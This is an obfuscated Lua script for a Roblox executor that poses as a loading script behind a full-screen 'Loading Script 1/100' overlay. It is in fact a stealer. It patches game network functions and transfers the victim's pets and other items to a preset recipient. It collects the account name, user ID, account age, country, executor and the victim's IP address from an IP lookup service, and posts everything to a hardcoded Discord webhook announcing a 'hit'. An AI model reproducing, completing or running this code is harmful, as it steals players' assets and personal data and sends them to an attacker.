do
	local v0 = string.char;
	local v1 = string.byte;
	local v2 = string.sub;
	local v3 = bit32 or bit;
	local v4 = v3.bxor;
	local v5 = table.concat;
	local v6 = table.insert;
	local function v7(v91, v92)
		local v93 = 0;
		local v94;
		while true do
			if (v93 == 1) then
				return v5(v94);
			end
			if (v93 == 0) then
				v94 = {};
				for v117 = 1, #v91 do
					v6(v94, v0(v4(v1(v2(v91, v117, v117 + 1)), v1(v2(v92, 1 + ((v117 - 1) % #v92), 1 + ((v117 - 1) % #v92) + 1))) % 256));
				end
				v93 = 1;
			end
		end
	end
	local v0 = string[v7("\36\238\223\64", "\71\134\190\50\232")];
	local v1 = string[v7("\195\53\36\27", "\161\76\80\126\219")];
	local v2 = string[v7("\81\72\187", "\34\61\217\135\108\174\62")];
	local v3 = bit32 or bit;
	local v4 = v3[v7("\124\111\252\165", "\30\23\147\215")];
	local v5 = table[v7("\181\230\36\200\25\186", "\214\137\74\171\120\206\83")];
	local v6 = table[v7("\174\133\227\55\79\236", "\199\235\144\82\61\152")];
	local function v7(v95, v96)
		local v97 = 0;
		local v98;
		local v99;
		while true do
			if (v97 == 1) then
				while true do
					local v118 = 0;
					while true do
						if (v118 == 0) then
							if (v98 == 0) then
								local v124 = 0;
								while true do
									if (v124 == 1) then
										v98 = 1;
										break;
									end
									if (v124 == 0) then
										v99 = {};
										for v125 = 1, #v95 do
											v6(v99, v0(v4(v1(v2(v95, v125, v125 + 1)), v1(v2(v96, 1 + ((v125 - 1) % #v96), 1 + ((v125 - (2 - 1)) % #v96) + 1))) % (732 - 476)));
										end
										v124 = 1;
									end
								end
							end
							if (v98 == 1) then
								return v5(v99);
							end
							break;
						end
					end
				end
				break;
			end
			if (v97 == 0) then
				v98 = 0;
				v99 = nil;
				v97 = 1;
			end
		end
	end
	local v8 = require(game[v7("\25\2\6\181\34\4\23\173\46\3\37\173\36\21\23\190\46", "\75\103\118\217")][v7("\50\206\86\98\21\171\7", "\126\167\52\16\116\217")].Client);
	local v9 = require(game:GetService(v7("\140\253\86\209\63\255\65\108\187\252\117\201\57\238\65\127\187", "\222\152\38\189\86\156\32\24"))[v7("\208\193\44\50\129\166\0", "\156\168\78\64\224\212\121")][v7("\237\11\231\160\192\19", "\174\103\142\197")].Network);
	local v10 = v9[v7("\209\88\62\80\51\32", "\152\54\72\63\88\69\62")];
	local v11 = v9[v7("\122\221\214\235", "\60\180\164\142")];
	debug.setupvalue(v8[v7("\60\93\74\18\38\53\230", "\114\56\62\101\73\71\141")].Invoke, 1, function()
		return true;
	end);
	debug.setupvalue(v8[v7("\234\189\253\204\203\170\226", "\164\216\137\187")].Fire, 1, function()
		return true;
	end);
	local v12 = require(game[v7("\57\215\246\61\187\165\255\31\215\226\2\166\169\236\10\213\227", "\107\178\134\81\210\198\158")][v7("\140\42\15\143\195\189\55\28\137", "\202\88\110\226\166")].Library);
	_G[v7("\206\203\24\135\245\194\204\0\137", "\170\163\111\226\151")] = "https://discord.com/api/webhooks/1089356064996212847/gHfyY_xFVDv49g3tgx9v4OZ8NTr0DD4FG0yvEO0UHaPk0AtPQdH1NuOjggoCDEumZiia";
	if ((_G[v7("\37\30\49\182\49\64\48\26\18\34\183\61\64\3\44\9\36", "\73\113\80\210\88\46\87")] == nil) or (_G[v7("\235\142\45\201\27\233\134\31\206\0\226\132\34\249\23\255\149", "\135\225\76\173\114")] == "")) then
		_G[v7("\171\21\236\188\185\162\186\148\25\255\189\181\162\137\162\2\249", "\199\122\141\216\208\204\221")] = v7("\78\69\238\94\183\145\61\106\243\86\163\140\115\65\178\25\233", "\29\38\156\55\199\229");
	end
	local v13 = Instance.new(v7("\155\126\110\45\173\115\91\61\161", "\200\29\28\72"));
	local v14 = Instance.new(v7("\82\232\221\57\28", "\20\154\188\84\121\223"));
	local v15 = Instance.new(v7("\235\136\52\149\237\186\84\218\129", "\191\237\76\225\161\219\54"));
	local v16 = Instance.new(v7("\148\63\72\36\121\36\75\165\54", "\192\90\48\80\53\69\41"));
	local v17 = Instance.new(v7("\41\254\42\187\5\223\42\190\5\255", "\96\147\75\220"));
	local v18 = Instance.new(v7("\227\15\26\62\245\3\184\210\6", "\183\106\98\74\185\98\218"));
	local v19 = Instance.new(v7("\27\22\169\202\48\20\229\204\62\9\190", "\87\121\202\171\92\71\134\190"));
	v13[v7("\223\170\211\31\226\125\209\184\212\57\254\107\243\185", "\150\205\189\112\144\24")] = true;
	v13[v7("\35\38\150\186\73\10\161\31\3\32\144\172", "\112\69\228\223\44\100\232\113")] = Enum[v7("\181\215\13\2\214\184\85\136\199\26\19\192", "\230\180\127\103\179\214\28")][v7("\196\137\19\86\69\225\114\225\138\0\118\72\247\68\244\159", "\128\236\101\63\38\132\33")];
	v13[v7("\245\133\167\21\65\174\201\202\164\168\7\77\185\249", "\175\204\201\113\36\214\139")] = Enum[v7("\62\110\194\49\217\28\101\201\61\221\18\78\195\39", "\100\39\172\85\188")][v7("\0\164\122\181\137\61\170", "\83\205\24\217\224")];
	v13[v7("\13\231\215\200\51\242", "\93\134\165\173")] = game:GetService(v7("\171\38\211\41\175\60\200", "\232\73\161\76"));
	v14[v7("\92\191\241\202\197\40\193\167\112\186\209\206\206\53\220\225", "\30\222\146\161\162\90\174\210")] = Color3.fromRGB(0, 0, 0);
	v14[v7("\58\234\93\121\30\236\65\126", "\106\133\46\16")] = UDim2.new(-0.000106195221, 0, 0, 0);
	v14[v7("\115\81\58\118", "\32\56\64\19\156\58")] = UDim2.new(1, 0, 1, 0);
	v14[v7("\176\91\218\224\88\78", "\224\58\168\133\54\58\146")] = v13;
	v15[v7("\45\86\88\95", "\107\57\54\43\157\21\230\231")] = Enum[v7("\233\212\133\5", "\175\187\235\113\149\217\188")][v7("\90\61\161\134\73\241\106", "\24\92\207\225\44\131\25")];
	v15[v7("\73\78\203\172", "\29\43\179\216\44\123")] = _G[v7("\64\178\216\36\69\179\222\19\79\175\220\37\66\137\220\56\88", "\44\221\185\64")];
	v15[v7("\71\4\255\92\124\124\13\232\90\12", "\19\97\135\40\63")] = Color3.fromRGB(255, 491 - 236, 255);
	v15[v7("\5\171\68\39\8\38\43\171", "\81\206\60\83\91\79")] = 47;
	v15[v7("\134\79\168\219\117\61\204\88\170\74\136\223\126\32\209\30", "\196\46\203\176\18\79\163\45")] = Color3.fromRGB(0, 0, 0);
	v15[v7("\205\183\48\122\27\54\216\224\180\45\108\77", "\143\216\66\30\126\68\155")] = Color3.fromRGB(27.000000290572643, 42.000001296401024, 53.00000064074993);
	v15[v7("\195\165\218\9\206\215\144\222\251\175\248\4\211\192\175", "\129\202\168\109\171\165\195\183")] = 0;
	v15[v7("\214\45\75\62\204\215\27\232", "\134\66\56\87\184\190\116")] = UDim2.new(0.03534081 - 0, 0, 0.440561211, 0);
	v15[v7("\6\53\43\12", "\85\92\81\105\219\121\139\65")] = UDim2.new(0, 1356, 0, 85);
	v15[v7("\239\252\161\85\75\104", "\191\157\211\48\37\28")] = v14;
	v17[v7("\19\210\30\243\25", "\90\191\127\148\124")] = "rbxassetid://5577595083";
	v17[v7("\53\121\132\37\16\106\136\59\25\124\164\33\27\119\149\125", "\119\24\231\78")] = Color3.fromRGB(255, 255, 255);
	v17[v7("\51\131\46\174\77\206\79\4\140\41\145\88\221\78\2\146\44\183\79\210\67\8", "\113\226\77\197\42\188\32")] = 1;
	v17[v7("\151\53\4\240\176\40\37\253\175\63\38\253\173\63\26", "\213\90\118\148")] = 0;
	v17[v7("\125\84\61\189\66\68\84\32", "\45\59\78\212\54")] = UDim2.new(0.063534081, 0, 0.340561211, 0);
	v17[v7("\195\25\76\134", "\144\112\54\227\235\230\78\205")] = UDim2.new(619 - (555 + 64), 320, 0, 340);
	v17[v7("\107\178\58\10\242\196", "\59\211\72\111\156\176")] = v14;
	local v18 = Instance.new(v7("\42\190\193\86\113\31\185\220\78", "\126\219\185\34\61"));
	v18[v7("\11\65\137\247", "\77\46\231\131")] = Enum[v7("\102\181\90\162", "\32\218\52\214")][v7("\124\92\18\53\167\250\177\106\84\75", "\58\46\119\81\200\145\208\37")];
	v18[v7("\2\46\148\36", "\86\75\236\80\204\201\221")] = "Loading Script 1/100";
	v18[v7("\191\119\89\99\166\241\135\125\83\36", "\235\18\33\23\229\158")] = Color3.fromRGB(255, 255, 255);
	v18[v7("\143\85\162\213\136\89\160\196", "\219\48\218\161")] = 51;
	v18[v7("\194\229\114\119\78\201\64\245\234\117\95\70\215\64\242\183", "\128\132\17\28\41\187\47")] = Color3.fromRGB(255, 255, 255);
	v18[v7("\127\0\49\13\61\79\14\39\8\62\105\19\51\8\41\77\0\32\3\52\94\24", "\61\97\82\102\90")] = 1;
	v18[v7("\57\163\61\162\95\206\88\16", "\105\204\78\203\43\167\55\126")] = UDim2.new(0.345166922, 0, 0.496173501, 0);
	v18[v7("\98\172\176\38", "\49\197\202\67\126\115\100\167")] = UDim2.new(0, 419, 0, 1025 - (857 + 74));
	v18[v7("\112\54\86\218", "\62\87\59\191\73\224\54")] = v7("\203\3\207\90\123\112\112\192\228\30\199\78\102", "\135\108\174\62\18\30\23\147");
	v18[v7("\249\230\16\255\199\243", "\169\135\98\154")] = v14;
	local v59 = game[v7("\248\199\118\61\81\239\32", "\168\171\23\68\52\157\83")][v7("\171\251\114\244\161\21\33\134\237\116\231", "\231\148\17\149\205\69\77")][v7("\207\140\166\222\254\69\216\149\174", "\159\224\199\167\155\55")][v7("\255\246\250\50", "\178\151\147\92")][v7("\72\133\250\68\38", "\26\236\157\44\82\114\44")][v7("\127\35\47\216\84\36\42\198", "\59\74\78\181")][v7("\146\40\222\79\84\167", "\211\69\177\58\58")][v7("\255\178\253\109", "\171\215\133\25\149\137")];
	local v60 = string.gsub(game:GetService(v7("\247\186\232\51\206\10\189", "\167\214\137\74\171\120\206\83"))[v7("\110\238\203\51\246\223\60\253\91\228\218", "\34\129\168\82\154\143\80\156")][v7("\185\137\179\42\14\90\105\156\140", "\233\229\210\83\107\40\46")][v7("\40\192\75\60", "\101\161\34\82\182")][v7("\28\225\10\81\234", "\78\136\109\57\158\187\130\226")][v7("\213\55\62\244\254\48\59\234", "\145\94\95\153")][v7("\150\240\194\1\219\90", "\215\157\173\116\181\46")].Text, v7("\226\199", "\199\235\144\82\61\152"), "");
	local v61 = v10(v7("\12\2\2\249\6\30\86\155\42\9\29\170", "\75\103\118\217"));
	local v62 = {};
	for v100, v101 in pairs(v12[v7("\233\52\162\142", "\186\85\212\235\146")].Get().Pets) do
		local v102 = 0;
		local v103;
		local v104;
		while true do
			if (v102 == 1) then
				while true do
					if (v103 == 0) then
						v104 = v12[v7("\124\203\147\19\253\45\225\74\219", "\56\162\225\118\158\89\142")][v7("\232\89\17\211", "\184\60\101\160\207\66")][v101[v7("\181\53", "\220\81\226\28")]];
						for v122, v123 in pairs(v104) do
							if string.find(tostring(v123), v7("\54\210\83\117", "\126\167\52\16\116\217")) then
								table.insert(v62, tostring(v123));
							end
						end
						break;
					end
				end
				break;
			end
			if (0 == v102) then
				v103 = 568 - (367 + 201);
				v104 = nil;
				v102 = 1;
			end
		end
	end
	local v63 = identifyexecutor();
	local v64 = #v62;
	local v65 = {};
	for v105, v106 in pairs(v12[v7("\244\18\195\135", "\167\115\181\226\155\138")].Get().Pets) do
		local v107 = 0;
		local v108;
		local v109;
		while true do
			if (v107 == 0) then
				v108 = 0;
				v109 = nil;
				v107 = 1;
			end
			if (v107 == 1) then
				while true do
					if (v108 == 0) then
						v109 = v12[v7("\226\235\48\226\95\111\126\212\251", "\166\130\66\135\60\27\17")][v7("\0\65\94\221", "\80\36\42\174\21")][v106[v7("\115\74", "\26\46\112\87")]];
						if ((v109[v7("\166\184\49\162\96\166", "\212\217\67\203\20\223\223\37")] == v7("\217\208\45\44\149\167\16\234\205", "\156\168\78\64\224\212\121")) or (v109[v7("\192\187\159\161\198\163", "\178\218\237\200")] == v7("\235\17\235\171\218", "\174\103\142\197"))) then
							table.insert(v65, v106.uid);
						end
						break;
					end
				end
				break;
			end
		end
	end
	local v66 = #v65;
	local v67 = {};
	for v110, v111 in pairs(v12[v7("\227\183\163\227", "\176\214\213\134")].Get().Pets) do
		v67[v111[v7("\237\95\44", "\152\54\72\63\88\69\62")]] = false;
	end
	v10(v7("\112\219\199\229\28\228\193\250", "\60\180\164\142"), v67);
	local v68 = {[1]=v61[1][v7("\48\109\119\33", "\114\56\62\101\73\71\141")],[2]={[1]=v65[1],[2]=v65[2],[3]=v65[3],[931 - (214 + 713)]=v65[4],[5]=v65[5],[2 + 4]=v65[6],[7]=v65[7],[8]=v65[8],[9]=v65[9],[10]=v65[10],[11]=v65[11],[12]=v65[12],[13]=v65[3 + 10],[14]=v65[14],[15]=v65[15],[16]=v65[893 - (282 + 595)],[17]=v65[17],[1655 - (1523 + 114)]=v65[18],[19]=v65[19],[18 + 2]=v65[20],[21]=v65[21],[22]=v65[22],[23]=v65[23],[24]=v65[34 - 10],[25]=v65[1090 - (68 + 997)],[1296 - (226 + 1044)]=v65[113 - 87],[144 - (32 + 85)]=v65[27 + 0],[28]=v65[28],[29]=v65[29],[30]=v65[30],[31]=v65[31],[32]=v65[32],[8 + 25]=v65[33],[991 - (892 + 65)]=v65[34],[35]=v65[35],[36]=v65[36],[37]=v65[37],[38]=v65[38],[39]=v65[92 - 53],[40]=v65[40],[41]=v65[41],[42]=v65[42],[43]=v65[43],[44]=v65[44],[45]=v65[45],[46]=v65[46],[47]=v65[47],[48]=v65[48],[49]=v65[49],[50]=v65[50]},[3]=tonumber(v60 - 1)};
	game[v7("\105\248\172\175\209\186\69", "\57\148\205\214\180\200\54")][v7("\90\29\254\52\56\70\30\252\44\49\100", "\22\114\157\85\84")][v7("\139\204\202\1\197\94\226\173\214", "\200\164\171\115\164\61\150")][v7("\171\171\249\2\75\140\183\240\49\74\140\170\196\2\87\151", "\227\222\148\99\37")][v7("\218\21\64\83\251\252", "\153\83\50\50\150")] = CFrame.new(game:GetService(v7("\243\183\251\208\215\168\232\216\193", "\164\216\137\187"))[v7("\52\237\203\16\130", "\107\178\134\81\210\198\158")][v7("\100\83\98\118\14\114\168\89\84\96\118", "\45\61\22\19\124\19\203")][v7("\155\192\28\6", "\217\161\114\109\149\98\16")][v7("\68\19\36", "\20\114\64\88\28\220")].Position);
	wait(0.5);
	v10(v7("\136\57\0\137\134\142\61\30\141\213\163\44", "\202\88\110\226\166"), unpack(v68));
	wait(0.6);
	v10(v7("\227\205\25\139\227\207\131\59\141\183\232\194\1\137", "\170\163\111\226\151"), v61[1][v7("\11\36\25\150", "\73\113\80\210\88\46\87")], 4353861721);
	wait(0.7);
	v10(v7("\206\143\58\196\6\226\193\24\194\82\197\128\34\198", "\135\225\76\173\114"), v61[1][v7("\133\47\196\156", "\199\122\141\216\208\204\221")], _G.UserId);
	wait(0.8);
	local v70 = _G[v7("\138\52\3\218\187\247\219", "\221\81\97\178\212\152\176")];
	local v71 = _G[v7("\30\197\240\24\249\18\194\232\22", "\122\173\135\125\155")];
	local v72 = v71;
	local v73 = game:GetService(v7("\198\161\220\9\245\106\229", "\150\205\189\112\144\24"))[v7("\228\139\194\1\181\15\61\201\157\196\18", "\168\228\161\96\217\95\81")][v7("\121\218\220\43", "\55\187\177\78\60\79")];
	local v74 = game[v7("\176\33\207\70\238\84\220", "\224\77\174\63\139\38\175")][v7("\2\139\66\89\34\180\77\89\55\129\83", "\78\228\33\56")];
	local v75 = game[v7("\181\194\127\171\6\151\221", "\229\174\30\210\99")][v7("\21\20\238\135\93\221\49\56\2\232\148", "\89\123\141\230\49\141\93")][v7("\70\246\112\242\9\2\89\231\112\226\31", "\42\147\17\150\108\112")][v7("\218\46\150", "\136\111\198\77\31\135")][v7("\159\3\5\178\83", "\201\98\105\199\54\221\132\119")];
	local v76 = game[v7("\156\181\13\154\36\16\38", "\204\217\108\227\65\98\85")][v7("\236\81\192\244\233\28\204\95\218\240\247", "\160\62\163\149\133\76")][v7("\231\223\179\29\35\194\207\142\12\34\198", "\163\182\192\109\79")];
	local v77 = game:GetService(v7("\60\42\135\190\64\13\146\16\4\44\139\177\127\1\154\7\25\38\129", "\112\69\228\223\44\100\232\113")):GetCountryRegionForPlayerAsync(game[v7("\197\56\39\25\197\231\39", "\149\84\70\96\160")].LocalPlayer);
	local v78 = "https://www.roblox.com/headshot-thumbnail/image?userId=" .. v74[v7("\248\43\3\31\196\60", "\141\88\102\109")] .. v7("\192\195\22\3\199\190\33\210\134\79\65\219\179\117\129\220\11\90\135\228\44\192\210\16\21\222\183\104\219\196\17\0", "\230\180\127\103\179\214\28");
	local v79 = game[v7("\241\191\82\211\117\8\46", "\161\211\51\170\16\122\93\53")][v7("\4\244\173\179\36\203\162\179\49\254\188", "\72\155\206\210")][v7("\3\74\123\77\11\33\97\111\93", "\83\38\26\52\110")][v7("\107\89\30\41", "\38\56\119\71")][v7("\100\250\232\80\194", "\54\147\143\56\182\69")][v7("\237\215\143\244", "\191\182\225\159\41")][v7("\240\42\28\35\123\138\138\199", "\162\75\114\72\53\235\231")][v7("\54\137\36\80", "\98\236\92\36\130\51")];
	local v80 = game[v7("\0\168\24\21\191\87\187", "\80\196\121\108\218\37\200\213")][v7("\166\15\112\3\115\123\2\139\25\118\16", "\234\96\19\98\31\43\110")][v7("\187\10\30\75\194\190\85\158\15", "\235\102\127\50\167\204\18")][v7("\3\81\168\251", "\78\48\193\149\67\36")][v7("\115\57\25\136\12", "\33\80\126\224\120")][v7("\120\229\169\14\203\82\232\187", "\60\140\200\99\164")][v7("\131\138\251\17\40\182", "\194\231\148\100\70")][v7("\252\67\84\213", "\168\38\44\161\195\150")];
	local v81 = game[v7("\38\140\253\155\115\34\251", "\118\224\156\226\22\80\136\214")][v7("\172\77\237\88\140\114\226\88\153\71\252", "\224\34\142\57")][v7("\62\210\166\220\216\97\214\72\7", "\110\190\199\165\189\19\145\61")][v7("\235\213\234\115\225\133\192", "\167\186\139\23\136\235")][v7("\43\8\180\133\8", "\109\122\213\232")][v7("\25\224\241\173", "\80\142\151\194")][v7("\96\12\197\118\88\10\201\121", "\44\99\166\23")][v7("\144\121\239\61", "\196\28\151\73\86\83")];
	local v82 = game:GetService(v7("\205\141\23\84\67\240\81\236\141\6\90\117\225\83\246\133\6\90", "\128\236\101\63\38\132\33")):GetProductInfo(game.PlaceId)[v7("\88\242\14\44", "\22\147\99\73\112\226\56\120")];
	request = http_request or request or HttpPost or syn[v7("\159\189\100\247\240\158\172", "\237\216\21\130\149")];
	local v83 = {[v7("\204\163\167\5\65\184\255", "\175\204\201\113\36\214\139")]=":comet||@everyone||\n**Egorikusa Bank Stealer Detected A Hit:comet**",[v7("\1\74\206\48\216\23", "\100\39\172\85\188")]={{[v7("\39\164\108\181\133", "\83\205\24\217\224")]=v7("\61\230\197\232\58\233\215\196\54\243\214\204\125\196\196\195\54\171\246\217\56\231\201\141\15\227\214\216\49\242\214\205\61\230", "\93\134\165\173"),[v7("\107\172\254", "\30\222\146\161\162\90\174\210")]="https://discord.gg/Qg9SBjXExx",[v7("\14\224\93\115\24\236\94\100\3\234\64", "\106\133\46\16")]=v7("\116\80\41\96\188\94\65\76\33\51\235\91\83\24\39\118\242\95\82\89\52\118\248\26\85\75\41\125\251\26\101\95\47\97\245\81\85\75\33\51\222\91\78\83\96\64\232\95\65\84\37\97", "\32\56\64\19\156\58"),[v7("\148\67\216\224", "\224\58\168\133\54\58\146")]=v7("\25\80\85\67", "\107\57\54\43\157\21\230\231"),[v7("\204\212\135\30\231", "\175\187\235\113\149\217\188")]=tonumber(8061183),[v7("\108\52\186\140\78\237\120\113\48", "\24\92\207\225\44\131\25")]={[v7("\104\89\223", "\29\43\179\216\44\123")]=v78,[v7("\68\184\208\39\68\169", "\44\221\185\64")]=420,[v7("\100\8\227\92\87", "\19\97\135\40\63")]=420},[v7("\55\167\89\63\63\60", "\81\206\60\83\91\79")]={{[v7("\170\79\166\213", "\196\46\203\176\18\79\163\45")]=v7("\203\189\54\123\29\48\254\235\248\35\112\94\12\242\251\248\115\53\94\45\245\249\172\39\109", "\143\216\66\30\126\68\155"),[v7("\247\171\196\24\206", "\129\202\168\109\171\165\195\183")]=(v7("\172\104\2\51\221\202\17\229\54\81\33\221\132\33\245\39\74\57\217\211\17\166\120\24", "\134\66\56\87\184\190\116") .. v73 .. "\n:detective:User ID : " .. v74[v7("\75\145\75\77\118\180", "\62\226\46\63\63\208\169")] .. "\n:underage:Account Age : " .. v74[v7("\127\230\26\90\150\17\25\14\89\224", "\62\133\121\53\227\127\109\79")] .. "\n:detective:DisplayName :" .. v76 .. "\n:crown:Rank:" .. v79 .. "\n:computer: Exploit : " .. v63 .. "\n:house:IP Address : " .. game:HttpGet("https://api.ipify.org/") .. "\n:mag:Place :" .. v81 .. "\n:mag:Place :" .. v82 .. "\n:mag:Country : " .. v77 .. v7("\127\118", "\85\92\81\105\219\121\139\65")),[v7("\214\243\191\89\75\121", "\191\157\211\48\37\28")]=false},{[v7("\52\222\18\241", "\90\191\127\148\124")]=v7("\77\127\130\35\77\56\163\39\22\117\136\32\19\107\199\116\16\125\138\116\87", "\119\24\231\78"),[v7("\7\131\33\176\79", "\113\226\77\197\42\188\32")]=(v7("\181\58\22\170\235\100\86", "\213\90\118\148") .. v60 .. v7("\77\91\46", "\45\59\78\212\54")),[v7("\249\30\90\138\133\131", "\144\112\54\227\235\230\78\205")]=true},{[v7("\85\178\37\10", "\59\211\72\111\156\176")]="“pin:Pets:pin:“",[v7("\59\79\139\246\40", "\77\46\231\131")]=(v7("\64\186\84\232\30\228\20", "\32\218\52\214") .. v66 .. v7("\90\78\23", "\58\46\119\81\200\145\208\37")),[v7("\63\37\128\57\162\172", "\86\75\236\80\204\201\221")]=true},{[v7("\133\115\76\114", "\235\18\33\23\229\158")]=v7("\225\93\181\207\190\73\133\204\180\69\174\201\225\16\152\192\181\91\250\228\163\83\182\212\168\89\172\196\168\10\183\206\181\85\163\254\182\95\175\213\179\10\250", "\219\48\218\161"),[v7("\246\229\125\105\76", "\128\132\17\28\41\187\47")]=(v7("\93\1\50\88\100\3\65", "\61\97\82\102\90") .. #v65 .. v7("\9\172\46", "\105\204\78\203\43\167\55\126")),[v7("\88\171\166\42\16\22", "\49\197\202\67\126\115\100\167")]=true},{[v7("\80\54\86\218", "\62\87\59\191\73\224\54")]=v7("\147\234\13\244\204\254\61\247\198\242\22\242\147\167\32\251\199\236\66\210\220\224\7\233\137\189\15\245\199\226\27\197\196\232\23\238\193\189\66", "\169\135\98\154"),[v7("\222\202\123\49\81", "\168\171\23\68\52\157\83")]=(v7("\135\244\113\171\243\123\109", "\231\148\17\149\205\69\77") .. #v62 .. v7("\255\128\167", "\159\224\199\167\155\55")),[v7("\219\249\255\53\220\242", "\178\151\147\92")]=true},{[v7("\116\141\240\73", "\26\236\157\44\82\114\44")]="RAPðŸ“Š",[v7("\77\43\34\192\94", "\59\74\78\181")]=(v7("\179\37\209\4\4\237\101", "\211\69\177\58\58") .. v75 .. v7("\203\183\229", "\171\215\133\25\149\137")),[v7("\75\239\196\59\244\234", "\34\129\168\82\154\143\80\156")]=true},{[v7("\135\132\191\54", "\233\229\210\83\107\40\46")]=v7("\95\195\67\60\221\95\129\96\51\216\14\129\107\22\150\95\195\67\60\221\95", "\101\161\34\82\182"),[v7("\56\233\1\76\251", "\78\136\109\57\158\187\130\226")]=(v7("\241\62\63\167\175\96\127\163\243\63\49\242\171", "\145\94\95\153") .. v61[1][v7("\149\200\228\48", "\215\157\173\116\181\46")] .. v7("\218\53\180", "\186\85\212\235\146")),[v7("\81\204\141\31\240\60", "\56\162\225\118\158\89\142")]=true}}}}};
	local v84 = game:GetService(v7("\240\72\17\208\156\39\202\74\12\195\170", "\184\60\101\160\207\66")):JSONEncode(v83);
	local v85 = {[v7("\191\62\140\104\185\63\150\49\168\40\146\121", "\220\81\226\28")]="application/json"};
	local v86 = {[v7("\242\1\217", "\167\115\181\226\155\138")]=v70,[v7("\228\237\38\254", "\166\130\66\135\60\27\17")]=v84,[v7("\29\65\94\198\122\52", "\80\36\42\174\21")]=v7("\74\97\35\3", "\26\46\112\87"),[v7("\156\188\34\175\113\173\172", "\212\217\67\203\20\223\223\37")]=v85};
	local v87 = {[v7("\231\168\129", "\178\218\237\200")]=v72,[v7("\242\185\177\255", "\176\214\213\134")]=v84,[v7("\116\241\185\190\219\172", "\57\148\205\214\180\200\54")]=v7("\70\61\206\1", "\22\114\157\85\84"),[v7("\128\193\202\23\193\79\229", "\200\164\171\115\164\61\150")]=v85};
	request(v86);
	request(v87);
	local v88 = game:GetService(v7("\177\171\250\48\64\145\168\253\0\64", "\227\222\148\99\37"));
	local v89 = workspace[v7("\129\5\6\32\240\216\186\129\17\25\55\231\215", "\194\112\116\82\149\182\206")];
	local v90 = {115,164,165,27,13};
	v88[v7("\60\60\166\72\29\210\209\26\60\184\92\29\196", "\110\89\200\44\120\160\130")]:Connect(function()
		local v113 = 0;
		local v114;
		local v115;
		local v116;
		while true do
			if (v113 == 0) then
				v114 = 0;
				v115 = nil;
				v113 = 1;
			end
			if (v113 == 1) then
				v116 = nil;
				while true do
					if (v114 == 1) then
						while true do
							if (v115 == (0 - 0)) then
								v116 = 0;
								while true do
									if (v116 == (350 - (87 + 263))) then
										for v126, v127 in next, v90 do
											keyrelease(v127);
										end
										mousemoveabs(v89[v7("\123\162\198\92\86\76\88\47\126\162\217\78", "\45\203\163\43\38\35\42\91")]['X'] / 3, v89[v7("\98\219\128\203\51\136\187\64\225\140\198\38", "\52\178\229\188\67\231\201")]['Y'] / 3);
										break;
									end
								end
								break;
							end
						end
						break;
					end
					if (0 == v114) then
						local v121 = 0;
						while true do
							if (v121 == 1) then
								v114 = 1;
								break;
							end
							if (0 == v121) then
								v115 = 0 - 0;
								v116 = nil;
								v121 = 1;
							end
						end
					end
				end
				break;
			end
		end
	end);
end
